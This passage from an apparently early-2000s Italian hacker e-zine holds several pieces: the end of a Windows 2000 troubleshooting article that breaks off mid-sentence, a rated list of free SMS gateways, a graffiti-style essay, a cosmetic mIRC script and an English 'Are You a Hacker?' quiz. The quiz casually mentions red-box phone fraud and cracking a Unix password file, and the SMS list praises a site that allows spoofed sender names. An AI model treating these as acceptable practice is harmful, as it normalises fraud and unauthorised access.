dinamico, come ASP, CGI e ISAPI, e permette agli sviluppatori di web di includere componenti Activex nei propri siti. IIS ha il Secure Socket Layer (SSL) che protegge il trasferimento di dati tra il client e il server. Un'altra importante funzione di IIS 5.0 e' la possibilita' di essere gestito anche dalla rete. * Indexing Service L'indexing service e' utile sui grandi hard disk con una buona performance. Indicizza i file del sistema per permettere una ricerca piu' veloce. Permette di cercare rapidamente perole contenute nei file. Puoi facilmente personalizzare ed impostare l'Indexing Service. Puoi controllare il processo di indicizzazione, scegliere di indicizzare solo particolari directory, e configurare il servizio per ottimizzarne le prestazioni. * La maggior parte degli altri componenti sono relativi alla rete, e non sono necessari se il pc non fa parte di una rete locale LAN (Local Area Network). [== Troubleshooting ==] Come la maggior parte dei prodotti Microsoft, Windows 2000 ha un'interfaccia di setup molto semplice ed user-friendly. Ma, naturalmente, si possono verificare vari errori. -> Blocchi di sistema Se per caso (succedera' sicuramente) il sistema dovesse bloccarsi (col classico schermo blu) resetta, e il setup automaticamente continuera' l'installazione. Ma se i blocchi si verificano spesso, e' probabile che tu abbia un hardware incompatibile con Windows 2000. In questo caso dovresti consultare l'HCL - Windows 2000 Hardware Compatibility List (incluso sul cd di installzione, \support\hcl.txt), e/o scaricare il "Microsoft Windows 2000 compatibility check program" (sul sito web www.microsoft.com). Ecco una lista dei piu' comuni crash di Windows 2000 e la loro spiegazione: ^ - IRQL_NOT_LESS_OR_EQUAL - Meaning that the core tried to gain access to a certain memory segment which is at a higher level of an Interupt Request Level (IRL) then allowed. While the proccess only allowed to have access to and IRL level no higher then their own. Recommendation: This error is probably caused by a faulty driver or a system service. Try using the "Last Good Known Configuration" option in the safe boot menu (F8 on boot). Note: If the error surfaces while installing Windows, check that all of your drivers are compatible with Windows 2000 (consult the HCL). - KMODE_EXCEPTION_NOT_HANDLED - This error is generated when the core can't handle a certain directive. Recommendation: The error might show you the name of the faulty driver. Try disabling it while booting into Safe Mode. Note: The situation can sometimes resolved using the Recovery Console. - NTFS_FILE_SYSTEM - This error is generated when there is a problem with the Ntfs.sys driver, which is meant to access inform sYn & Norman^B^ w w w . h a c k e r s a t . c o m ø-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-ø ø MONDO SMS ø ø ø ø¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥ø Inviare gratis SMS a cellulari italiani Elenco dei principali siti per l'invio di SMS da Web e da e-mail. L'elenco è aggiornato ad Ottobre 2000 e potrebbe subire variazioni in considerazione della nuova politica che i nostri gestori potrebbero mettere in atto sulla consegna degli SMS (adesso per un gestore è gratis, in futuro, forse, diverrà a pagamento). Nell'elenco sono stati volutamente eliminati quei siti non dotati di un gateway proprio e che offrono il servizio in collaborazione con altri (come SMShome.net che attualmente collabora con Clarence). I siti sono stati suddivisi in categorie, per una più facile consultazione. Ove non specificato altrimenti, sono sottintesi i seguenti parametri: invio: gratuito registrazione al sito per l'accesso: non richiesta lunghezza massima per SMS: dato non pervenuto possibili destinatari SMS: tutti i cellulari italiani (non è garantito l'ETACS) totale SMS inviabili al giorno: dato non pervenuto -------------------------------------------------------------------------------- Categoria -> siti specializzati <<< Nati intorno alla telefonia mobile, i siti "specializzati" offrono oggi il massimo dell'integrazione tra SMS e e-mail, calendari, fax, informazione e servizi, come loghi e suonerie. Qui l' SMS è alla base del business ! >>> » Quios * * * * * Dopo l'enorme successo in tutto il mondo, Quios (si leggi "chi-os" arriva in Italia, con servizi innovativi. L'invio di SMS (max 128 caratteri) a qualunque utente nel mondo si rivela molto rapido. Si fa apprezzare la gestione della rubrica, che prevede la creazione di gruppi. È inoltre possibile ricevere gratuitamente la notifica di ricezione e-mail via SMS, riportante il mittente e il titolo. Oltre a gestire un'agenda personale che notifica gli eventi via SMS (come l'italiano ProntoAgenda), è possibile anche richiedere l'invio differito di SMS, ovvero ad una data prestabilita (ad esempio fare gli auguri ad un amico il giorno del suo compleanno). In diverse lingue sono sempre disponibili servizi d'informazione curati direttamente da Quios (oroscopo, previsioni del tempo, news in collaborazione con Slashdot.org e altro) o, con Planet Quios, dai reporter, ovvero esperti che hanno deciso di collaborare gratuitamente con Quios per fornire ogni genere d'informazione (la lista è lunghissima e ci siamo anche noi - reporter aquilareale). Possibilità per chi ha un sito di essere sempre raggiunto via SMS, senza dover dare il proprio numero di cellulare. http://www.quios.com/ » WikeyFun * * * * * Un sito per appassionati. È l'unico sito che consente di indicare un mittente qualsiasi (ad esempio è possibile inviare un SMS col nome DIO ...). SMS da 160 caratteri e disponibili in modalità Flash. Loghi e picture SMS per cellulari Siemens - altra rarità - completano il quadro. Presto anche giochi e suonerie. http://www.wikeyfun.com/ » WAPPI * * * * * Offre servizi WAP e web-mail di alta qualità. Per inviare SMS (di 142 caratteri) da web a qualunque cellulare GSM nel mondo occorre registrarsi presso WAPPI e anche presso CLUBNET (una vera trafila !). Di WAPPI però teniamo a precisare che è l'unico sito in Italia che invia il contenuto (e non un'anonima notifica) delle e-mail ricevute direttamente sul proprio cellulare tramite SMS. Peccato per l'obbligo al consenso del trattamento dati: di tanto in tanto (in verità raramente) WAPPI invia SMS sui cellulari degli iscritti per informarli di iniziative ed altro. http://www.wappi.com/ » Clarence * * * * * SMS da 160 caratteri, tanti loghi e suonerie. Insuperabile. http://sms.clarence.com/index.php3 » UMAIL* * * * * Servizio unificato tra e-mail e SMS (per tutti e soli i cellulari GSM). Occorre registrarsi e possono registrarsi solo gli utenti TIN, compresi gli utenti CLUBNET. Consente di ricevere e-mail via SMS e inviare e-mail tramite SMS. Le e-mail sono consultabili anche da web e da wap. È possibile inviare gratis SMS (137 caratteri) da web a tutto il mondo e, unico in Italia, consente di ascoltare le e-mail ricevute col telefono e rispondere (tramite allegato vocale) o trasferire su fax. A breve sarà attivato anche l'invio gratuito di fax da web. http://www.umail.it/ » Mailsurf * * * * * Europeo (anche versione italiana), occorre registrarsi. Permette di inviare SMS di 130 caratteri (solo 20 al mese gratis, gli altri a pagamento). Da apprezzare la possibilità di inviare gratis - unico nel suo genere - fino a 30 lettere tradizionali al mese in tutto il mondo. Tra i servizi disponibili un calendario, spazio web, indirizzo di e-mail, cartoline elettroniche, fax (a pagamento), aste e scambio file. http://www.mailsurf.com/ » ProntoSMS * * * * * ProntoSMS consente, solo agli utenti registrati, di inviare SMS di 147 caratteri a tutti i cellulari italiani (escluso BLU !!!). ProntoAgenda è invece un'agenda personale consultabile da web che avvisa con e-mail o SMS l'evento da ricordare al giorno e all'ora stabilita. http://pronto.agenda.it/User/SMS/ » GSMBOX * * * * Il primo portale europeo multilingue sulla telefonia mobile, anche in versione WAP. Oltre all'invio SMS (di 120 caratteri massimo), ci sono ulteriori servizi a patto di registrarsi. Si tratta essenzialmente dell'integrazione tra e-mail e cellulare e dell'offerta di servizi automatici di ricezione SMS a carattere tematico (sport, gossip, f1, borsa, meteo, viaggi, zodiaco). È l'unico sito che permette (agli utenti registrati) l'invio di SMS riportanti come mittente il loro numero di cellulare, consentendo così la possibilità di una risposta immediata da chi riceve il messaggio. http://www.gsmbox.com/ » CellForum * * Forum di discussione sulla telefonia cellulare. Possibilità per gli utenti registrati di inviare 10 SMS al giorno (max 120 caratteri). I destinatari non possono essere utenti BLU né TIM TACS. L'invio è possibile solo da rubrica. Tra tanti limiti, l'unica nota positiva è rappresentata dall'archivio che riporta anche lo stato attuale del messaggio. http://cellforum.made.net/ » Send it * * Il noto Buongiorno by mail invade i cellulari con questo nuovo sito, Send it. Invio di SMS da 150 caratteri, solo per gli utenti registrati. Ci si può sottoscrivere a molti servizi ricevibili via SMS, lo scotto da pagare è la ricezione ogni 4/5 SMS di 1 SMS a carattere pubblicitario. http://www.send.it Categoria -> siti stranieri abilitati all'invio di SMS verso l'Italia <<< All'estero certo non stanno a guardare. Lo svantaggio di questi siti è dato dalla lingua, il vantaggio dalla qualità e l'universalità. In generale i siti italiani sono meglio attrezzati: la possibilità di inviare SMS da web gratuitamente è ancora un miraggio in alcuni paesi, questi siti sopperiscono alla mancanza. >>> » VIT * * * In islandese, di difficile consultazione. Consente l'invio gratuito da web e da e-mail (senza pubblicità). http://www.vit.is/ » MTN * * * In inglese. Occorre registrarsi. Consente di inviare rapidamente SMS (max 147 caratteri) a quasi tutto il mondo (ma non ad utenti Omnitel !!!). Gradevole e originale l'interfaccia, che gestisce una rubrica e - uno dei pochi a concederlo gratis - lo storico dei messaggi (compreso lo stato del messaggio, ovvero se è stato realmente consegnato o meno sul cellulare del destinatario). http://www.mtnsms.com/ » SMS.GATE.RU * * * In russo. Consente di inviare SMS di 160 caratteri da web, oltre ad abilitare chiunque (non occorre iscrizione) all'invio di SMS via e-mail e viceversa. Nonostante l'assenza di una pagina in inglese, il sito è abbastanza fruibile e, grazie ai brevi esempi, il funzionamento è facilmente intuibile. http://sms.gate.ru/ Categoria -> gestori di telefonia mobile <<< I nostri gestori permettono di inviare SMS da web. Il primo a dotarsi di questo strumento è stato Omnitel. In notevole ritardo TIM, che consente l'invio solo ai suoi utenti. >>> » InWind * * * * * InWind si propone quale portale multimediale e multiaccesso. Tutti i servizi sono rivolti agli utenti registrati. E-mail consultabili da WAP, Web e programmi di posta. Molti i servizi forniti tramite SMS: rubrica, servizi tematici ma anche di utilità, quali rubrica e notifica arrivo e-mail. Notevole la possibilità di chattare tramite SMS usando, da web, il nickname del destinatario piuttosto che il numero del cellulare - solo InWind offre questa possibilità - http://www.inwind.it/ » Il portale di BLU * * * * SMS fino a 160 caratteri, e per gli utenti registrati (non occorre avere un cellulare BLU) anche la possibilità di inviare SMS da rubrica (prevista la gestione gruppi). Gli utenti BLU possono richiedere la notifica sul proprio cellulare all'arrivo di una e-mail (servizio già attivo ma non ancora funzionante). http://www.blu.it/ » Omnitel 2000 * * * SMS da 140 caratteri sul portale di Omnitel 2000, inviabili a tutti. Per tutti gli altri servizi occorre registrarsi. Servizi di news e attualità via sms e wap, con lo stile e le risorse di un gestore di telefonia mobile. E-mail consultabili dal sito WAP di Omnitel 2000, Web, programmi di posta e, unico nel suo genere, anche da telefono di rete fissa. Possibilità (per tutti) di inviare loghi, suonerie e - unico in Italia - picture SMS. Notifica arrivo e-mail via SMS. Servizi gratuiti e per tutti gli utenti. http://sms.2000.omnitel.it/ » Tim Universal Number * * Dal sito è possibile inviare gratuitamente messaggi di 640 caratteri che verranno automaticamente divisi in più SMS. Convergenza di diversi servizi tra e-mail, fax, SMS solo per clienti TIM. Notifica ricezione e-mail gratuita. Non tutti i servizi sono gratuiti, come la lettura di una e-mail via SMS (£ 300 iva inclusa - il sito Wappi offre tale servizio gratuitamente). La notifica invece è gratuita. http://www.uni.tim.it/ » Omnitel * I servizi sono integrati con Omnitel 2000. Per gli utenti registrati ad Internet Mailbox (possibile a tutti, indipendentemente dal gestore) c'è la possibilità di inviare SMS di 120 caratteri (solo ad utenti Omnitel) dalla pagina della posta. Francamente non si capisce perché dal sito di Omnitel si possono inviare SMS solo a cellulari Omnitel, da Omnitel 2000 invece a tutti. http://imb.omnitel.it/ Categoria -> gestori di telefonia fissa <<< Anche i gestori di telefonia fissa consentono l'invio di SMS. Il servizio è purtroppo ridotto all'essenziale. >>> » Tibercom* * Gestore di telefonia fissa del centro Italia, consente l'invio di SMS di 160 caratteri http://www.tibercom.it/ » Lombardiacom * Gestore di telefonia fissa del nord Italia, consente l'invio di SMS di 143 caratteri http://www.lombardiacom.it/sms/ Categoria -> portali <<< I portali italiani, primi fra tutti Kataweb e Jumpy, sono dotati quasi tutti di un gateway SMS. In pochi hanno però sviluppato servizi a valore aggiunto. >>> » Italia On Line * * Veramente completo il servizio di invio SMS (massimo 140 caratteri) da web di Italia On Line (occorre registarsi). Rubrica e flash SMS, invio differito e - unico sul web - possibilità di salvare l'SMS nella propria casella di posta. http://sms.iol.it/ » CiaoWeb * * Portale tuttofare italiano, tra i più dinamici. Oltre all'invio di SMS da web (120 caratteri), offre la notifica gratuita dell'arrivo di una e-mail via SMS. http://www.ciaoweb.it » Everyday.com * * Occorre registrarsi per inviare gratuitamente ogni giorno un massimo di 10 SMS (lunghezza massima di 142 caratteri). Gli SMS sono inviabili a qualunque cellulare GSM nel mondo. Utile la rubrica personale che avverte con e-mail o SMS un evento da ricordare. http://www.everyday.com/ » Infinito * * Occorre registrarsi per inviare SMS da web e per accedere ai servizi di Infinito. Al momento della registrazione, purtroppo, occorre fornire il proprio numero di cellulare (indispensabile per l'accesso a tutti i servizi wireless). La novità che propone Infinito è un accesso completo al proprio sito, con qualunque dispositivo. Non solo tramite internet, ma anche tramite cellulari WAP e computer palmari (attualmente sono abilitati: PalmPilot, Palm III, Palm V, Palm VII, Handspring Visor, Philips Nino, Casio Cassiopeia). E per i primi cellulari (quelli senza WAP) c'è l'opportunità di iscriversi a canali tematici con ricezione del materiale tramite SMS. La ricezione degli SMS, così come avviene per i siti concorrenti, è gratuita. http://www.infinito.it/ » Jumpy * * Solo 125 caratteri a disposizione per 1 SMS e una raccolta di frasi famose da inviare ad amici e conoscenti. Jumpy, portale generalista italiano, offre gli stessi servizi automatici di ricezione SMS a carattere tematico (sport, gossip, f1, borsa, meteo, viaggi, zodiaco) di GSMBOX, che infatti fa parte del Network di Jumpy. http://www.jumpy.it/830sms.htm » Cellularmania Kataweb Repubblica.it KwMusica CNNitalia.it Radio Capital Radio Deejay * * CellularMania è un sito dedicato ai cellulari di buona qualità. Possibilità di acquistare i cellulari da web. Kataweb è un potente portale generalista italiano e nuovo gestore di telefonia fissa. Il gateway SMS (lunghezza massima 120 caratteri) è condiviso dai siti partner e la scritta "Sono espressamente vietate le forme di utilizzo professionale del servizio e quelle che prevedano una generazione automatica dei messaggi" è un avvertimento per webmaster e programmatori di software SMS circa l'utilizzo del gateway stesso. A questo proposito ricordiamo le lodevoli scelte diverse fatte da portali come Clarence. http://www.cellularmania.com http://www.kataweb.it http://www.repubblica.it http://www.kwmusica.kataweb.it http://www.cnnitalia.it http://www.capital.it http://www.deejay.it » SuperEva * * Portale italiano. Invio di SMS da web (120 caratteri), possibilità di scegliere la modalità flash. Occorre registrarsi. http://freesms.supereva.it/cgi-bin/index.chm » Caltanet * Giovane portale italiano. SMS di 140 caratteri, non occorre iscriversi. http://www.caltanet.it/ » Monrif * Portale recente. SMS di 140 caratteri gratis per gli iscritti verso tutti i cellulari italiani (escluso BLU !!!). C'è di meglio sulla rete. http://mysms.monrif.net » E-loft * Sito europeo degli studenti. SMS di 145 caratteri inviabili in tutta Europa. http://www.it.e-loft.com/ » HOT * Portale italiano. Invio di SMS da web (140 caratteri) riservato agli iscritti. Possibilità di ricevere SMS sulla F1. http://www.hot.it/sms/ » Kiberlandia * Portale italiano. Invio di SMS da web (110 caratteri, 120 caratteri agli iscritti). Ovvero il minimo indispensabile, anche meno. http://www.kyberlandia.it/Servizi/SMS/default.asp Categoria -> siti commerciali <<< Gli SMS sono usati anche da siti nati intorno all'e-commerce. Vediamo come. >>> » CHL * * * * Occorre registrarsi presso CHL per godere dell'avanzato servizio di invio SMS da web. La lunghezza degli SMS è di soli 125 caratteri (il resto è pubblicità), ma è da sottolineare la possibilità di invio in modalità flash e la gestione della rubrica, con divisione in gruppi. È possibile usare gli SMS per fare acquisti (servizio Pocket). Possibilità di inviare anche fax gratuitamente. http://www.chl.it/ » Flashmall * * Ottimo sito di acquisti on-line, con una sezione dedicata all'invio gratuito di 5 SMS giornalieri di 125 caratteri ognuno. E' possibile chiedere di essere avvisati da un SMS all'arrivo di un prodotto qualora questo fosse indisponibile. http://www.flashmall.it/sms.asp?action=sms Categoria -> altri <<< Altri siti hanno pensato di usare gli SMS solo per attrarre utenti oppure per sviluppare progetti inediti, basati proprio sugli SMS. >>> » Enel * * Il principale fornitore di energia elettrica in Italia ha un portale tutto suo, con tanto di gateway per l'invio di SMS. La lunghezza massima è di 320 caratteri, quindi messaggi molto lunghi verranno divisi in 2 o 3 SMS (Enel aggiunge una firma alla fine dei messaggi) http://www.enel.it » GoingTonight * GoingTonight non è il classico sito per l'invio di SMS da web. GoingTonight è una comunità o "il primo villaggio mobile del mondo", come amano definirsi. Consente agli iscritti di inviare fino a 100 SMS alla propria lista di destinatari. Così, se un gruppo di amici vuole mettersi d'accordo sull'uscita serale, inviando un SMS a GoingTonight, GoingTonight si preoccuperà di smistarlo subito agli amici. I quali, se sono iscritti, potranno rispondere. Superata quota 100, i messaggi si pagano. Inoltre si riceve pubblicità mirata via SMS. I messaggi possono essere inviati anche da web. Possibilità per chi ha un sito di essere sempre raggiunto via SMS, senza dover dare il proprio numero di cellulare. http://www.goingtonight.it/ Categoria -> Siti a pagamento <<< Offrono l'invio di SMS a pagamento. Quando i gateway free erano una rarità, potevano anche interessare, adesso sono deserti >>> » SMS.it * £ 150 a messaggio per un sito ricco nell'offerta (invio a tutto il mondo, rubrica, corretto numero del mittente, consegna immediata, notifica, archivio, invio multiplo e differito, stato messaggio. Adesso questa stessa offerta la si può trovare a costo zero. Se poi preferite lo stesso pagare ... http://www.sms.it/gratis.htm » netSms Inviare SMS da web (max 150 caratteri) e pagarli £ 300 ognuno ? Per masochisti http://netsms.com/ Categoria -> siti non più abilitati <<< Cimitero di gateway web2sms. Hanno avuto il loro momento di gloria, piccolo o grande, poi non hanno retto i forti costi. Visitarli e vederli non operativi mette una certa angoscia ... >>> » AdriaCom Cell.it JavaroNet ShinySMS Questi gateway non sono attualmente attivi. © Copyright SMS "NOPOPS" Spa 2000-2001 ø-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-ø ø WRITERS BLOCK (LO STILE) ø ø Jrash ø ø¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥ø ===================================WRITERS BLOCK (lo stile)==================================== (*)*(*)*(*)*(*)*(*)*(*)*(*)*(*)*(*) Autore: Jrash^^ Crew : H@team E-mail: jrash@hackersat.com URL : www.hackersat.com (*)*(*)*(*)*(*)*(*)*(*)*(*)*(*)*(*) Salve ragazzi sono ancora io, Jrash , in questo articolo vorrei parlarvi di un argomento che riguarda l HIP HOP .... è un argomento molto interessante leggetelo!! Mi riferisco soprattutto a coloro che hanno voglia di imparare.. Cosa è lo stile?? Andiamo diretti al nocciolo...è la sostanza di cui sono fatti i trend....è qualcosa di accattivante, qualcosa che ispira profondamente, qualcosa che una volta iniziato fara parlare di sé e sara seguito dalla gente.... ora arriviamo proprio al culmine..la moda è un luogo nel quale si rimane un istante.... lo stile è un luogo che si raggiunge dopo aver ricevuto un calcio nel sedere e ci si rimane per sempre . Lo stile rimane con te perche sei tu. La moda è nulla senza lo stile, perche lo stile governa. Adesso parliamo della parte tecnica e smonteremo la faccenda come se fosse una macchina. Rimanendo incollati al concetti di stile e di moda potremmo utilizzare una bella ragazza per esempio, anche se verro accusato di masochismo. Le frecce sono diventate un fondamento dello stile ..e vanno ancora di moda . Eppure metterle sul vostro pezzo non bastera a farlo funzionare. Coloro i quali riescono a riconoscere quando una cosa sembra ma non è riescono ad individiuare i writer che fanno uso di colori pazzeschi come anche quelle cose che spuntano dai loro pezzi dando l illusione di complessita quando invece è lo schema dei colori a far sembrare le loro lettere cosi. Non si puo dire che non ci sia lo stile, ma se vogliamo parlare a un altro livello è quello che io chiamo robba fasulla. Un mio compare ha detto di quei pezzi che le uniche cose in wildstile erano la prima e l ultima lettera, mentre il restante era formato da caratteri mediocri con un gusto decente ma senza densita. Per prima cosa tenete a mente una cosa: frecce, ornamenti e sfondi non sono segno di stile. squisite capacita tecniche e padronanza di tappini e bombolette non pareggiano lo stile, ma una combinazione degli elementi qui sopra citati puo rendere efficiente lo stile di ognuno . Prima di continuare mi piacerebbe dire che tutto questo è stato valutato dopo aver acquisito esperienze e contatto con lo stile e dopo aver fatto del lettering un mestiere ...infiniti sono i confini, ma all interno dei confini dell infinito esistono fondamenti tecnici del tipo una linea retta non puo venire curvata. Tutte queste cose derivano dall esperienza e dall occhio e che ognuno puo raggiungere una volta che gliele si porta all attenzione .Non è automatico che tutti i terzi occhi vedano la stessa cosa, ma alla fine la maggior parte comprendera la totalita della scienza che governa uno stile all interno di questo infinito . Possiamo odiare uno stile o amarlo ,ma questo non altera necessariamente la sua qualita. Per potere essere un connoisseur, l improrogabile condizione di partenza deve essere quella di conoscere la propria roba. Non permettete che quelli che pronunciano la parola stile lo facciano senza cognizione di causa Potrebbero essere dei falsi. Le decorazioni in origine facevano parte delle firme e dei pezzi e potrebbero venire restituite alle firme con lo stile della firma come pezzo...ma non come se fosse un idea o concetto definitivo che vada controcorrente riguardo ai particolari che una volta venivano usati per i pezzi. Prendete nota del fatto che all inizio non esiste vano schemi precisi. Alla fine degli anni 70 e nei primi anni 80 i writer cominciarono ad avere piu materiale al quale riferirsi e quindi un idea migliore delle possibili direzioni da intraprendere . Con i pezzi , le connessioni e le frecce si fusero e diedero inizio ad uno stile che poi divenne una moda con il proprio stile . Era facile far intuire che questo concetto avrebbe potuto essere portato avanti, quindi queste caratteristiche divennero multiple. E adesso andremo indietro per scoprire come queste condizioni non determino necessariamente la riuscita di un buon pezzo. Una cosa che noterete delle frecce e che tendono sempre ad avere una posizione che possa conferire al pezzo un senso di movimento... possono fluire dalla sinistra alla destra , ma se viene a mancare questo tipo di approccio , si dovrebbe comunque fare in modo di distribuirle equamente lungo il pezzo. Non sta scritto da nessuna parte che debbano andare per forza da sinistra a destra ..ma è proprio qui che lo stile subentra per completare la moda. Le frecce non sono state inventate con lo scopo di avere una funzione precisa, esse sono un concetto che inizio per il semplice motivo che era una cosa che si poteva fare . E cosi è stato. Una volta concepite le frecce , gli errori e gli esperimenti nella loro realizzazione portarono a capire che il loro uso , cosi come il loro posizionamento , offre variazioni infinite. E concettuale!! In principio furono concepite ed introdotte come frecce e punti... ed erano smussate, non appuntite. Un famoso writer di new york fu veloce a far notare il fatto che: siccome non c è nessuno la fuori che sta davvero facendo qualcosa, la roba fiacca viene considerata grandiosa ! La mia convinzione è che se i writer portassero questa roba ad un altro livello , altri sarebbero in grado di distinguere lo squisito dal bell fatto. La bomba è stata sparata ed esplode.Un milione di cerchi, intrecci e duemila frecce non stanno ad indicare che ce l hai fatta. Puoi prendere due pezzi dello stesso writer e vedere il perche uno funziona e l altro non ce la fatta... Forse perche l aveva fatto troppo complicato rompendo l armonia e la continuita. Forse lo schema dei colori non funzionava e rovinava tutto l insieme. forse uno normale non riesce a scorgere questi particolari perche i suoi standard si basano ancora sul "simile a " , "diverso dal" gente che non fa writing e che non sa nulla di cio che i writer considerano "ThE mAgNiFiCiEnT"! Non importa quanto uno sia bravo tecnicamente, lo stile è l unicita dello stile dipendono dall occhio dalla capacita di comprendere le forme e dall immaginazione. Si tratta di capire instintivamente come scorrere come dirigere il tratto , come collegare le frecce , come unire le lettere , tubi e linee e di conseguenza è una cosa che alcuni hanno , mentre altri decisamente no. Tecnicamente il pezzo è l unico elemento chiarificante. Ovviamente non si puo fare come i professori ed indicare tutte le imprecisioni per cui un pezzo non funziona rispetto ad un altro, vatutto molto al di la degli standard. Questo è un dato di fatto. E un po come cantare off beat. Uno va in off beat solo perche siamo progammati a credere di sapere cosa significhi essere "on beat"? O è semplicemente un istinto , quello che constringe ad andare in off beat? Pensate che tutto questo sia discutibile? Cos è un pezzo in wildstyle che ha senso? Frecce che fluiscono ogni dove contro le frecce che nonb riescono a muoversi . Se prendete in considerazione la maggior parte dei pezzi , per i quali garatisco io stesso che sono fatti senza uno studio preciso, troverete che questo approccio è stato assimilato. Per esempio, come dicevo prima , le frecce partono di solito da sinistra a destra . Possono andare verso l alto , il basso e qualche altra direzione ,ma non possono andarsene a spasso da qualunque parte. Se fosse cosi tutti riuscirebbero ad essere stilosi...non si potrebbe parlare di pezzi, perche non ci sarebbe nessuna base sulla quale discutere la qualita , la competenza e la compattezza di una composizione. Penso che questa conversazione potrebbe non avere mai fine. L esperienza dell occhio della mente è la miglior insegnante . Gli ornamenti sono dei materiali che non vengono utilizzati con le dovute conoscenze sul come lavorarli fuori al meglio...non ti faranno mai risultare vincente. In un regno in quale i ciechi possono essere d accordo con le nostre convinzioni, lo stile...sebbene sia quello che tu lo fai essere...non è sempre farlo ,non senza la corretta comprensione delle sue dinamiche. Persino uno stile nuovo ,in grado di spezzare il legname con le origini, deve per forza possedere qualcosa che lo renda figo, che gli metta le ali ed il suo possedere dovra avere l abilita di assorbire questa realta...Opinione?? Chiamatelo come volete lo stile è cio che tu ne fai di esso e quello che fai parla da solo..Immagginatevi se parlassimo seriamente... o se stessimo riempiendo queste pagine solo per farvi impazzire, nel frattempo...mandateci un po di robba vostra e smettetela di essere timidi . Senza cercare di avere l ultima parola in merito proveremo a farvi notare cosa vi manca ...sempre che abbiate le palle di mettere la vostra roba sulla linea del fuoco....... Alla proxima!! Un saluto da parte di Jrash^^!! Ringraziamenti:un saluto a tutti quelli dell H@team; un bacione a Morgana^^ e a Maryee!! Un FUCK OFF a Giada, e a tutti quelli che mi odiano (dolcissimo=cazzone)!! JRASH 26/01/2001 =====================jrash@hackersat.com===H@team=====================================[Jrash^^]° ø-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-ø ø EFFETTO CON IL MIRC! ø ø NCKxxx ø ø¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥ø Ciao ragazzi sono Syn, scrivo questo mini art da parte di un mio amico. Un giorno mi disse di provare un effetto con il conosciutissimo client "mIRC"... Mi piaciuto talmente che ho deciso di pubblicarlo. E' anche un motivo per ringraziarlo e mettere alla luce il suo impegno (sta per finire il suo script!) NCKxxx è vivo e vegeto, questo è riferito a molti che chiedono di questo membro!! :) eccovi il codice: /timer 0 0 /colour listbox $rand(1,15) | /colour background $rand(1,15) | /colour editbox $rand(1,15) | /colour listbox text $rand(1,15) | /colour editbox text $rand(1,15) | /colour normal text $rand(1,15) | /colour own text $rand(1,15) per termimarlo scrivete /timer 0 off ciao --------------------------=fInE numero "3" della rivista "DirtyNet"=--------------------------- DirtyNet3 è finita...andate in pace... =RingaZiaMenti= ::::::::::: Tepippo Screener_it TankCommandos Crew Avatar Lo-Regio Giada Federica P. Agnello Totti Carminuccio Articolo31 Gollo Scafuto Scafuti Chip Carmen Consoli mR_bIsOn Chicca: Are You a Hacker? by ReDragon Take a little quiz for me today. Tell me if you fit this description. You got your net account several months ago. You have been surfing the net, and you laugh at those media reports of the information superhighway. You have a red box, you don't have to pay for phone calls. You have crackerjack, and you have run it on the password file at a unix you got an account on. Everyone at your school is impressed by your computer knowledge, you are the one the teachers ask for help. Does this sound like you? You are not a hacker. There are thousands of you out there. You buy 2600 and you ask questions. You read phrack and you ask questions. You join #hack and you ask questions. You ask all of these questions, and you ask what is wrong with that? After all, to be a hacker is to question things, is it not? But, you do not want knowledge. You want answers. You do not want to learn how things work. You want answers. You do not want to explore. All you want to know is the answer to your damn questions. You are not a hacker. Hacking is not about answers. Hacking is about the path you take to find the answers. If you want help, don't ask for answers, ask for a pointer to the path you need to take to find out those answers for yourself. Because it is not the people with the answers that are the hackers, it is the people that are travelling along the path. ConClusIOne ::::::::::: L'uomo che sa, sa di non sapere. (Socrate) Ognuno di noi vuole essere unico, in realtà lo siamo tutti. (sYn) Il giudizio universale è alle porte...non apritelo, neanche se bussa tre volte!!! (sYn) Chiunque voglia collaborare , puo' sempre inviare i propi art a "syn@hackersat.com"; è chiaro saranno valutati prima. CMQ siete tutti ben accetti. __ __ ___ ___ ___ | \ | |__) | \ / |\ | |__ | ritornerà... |__/ | | \ | | | \| |___ |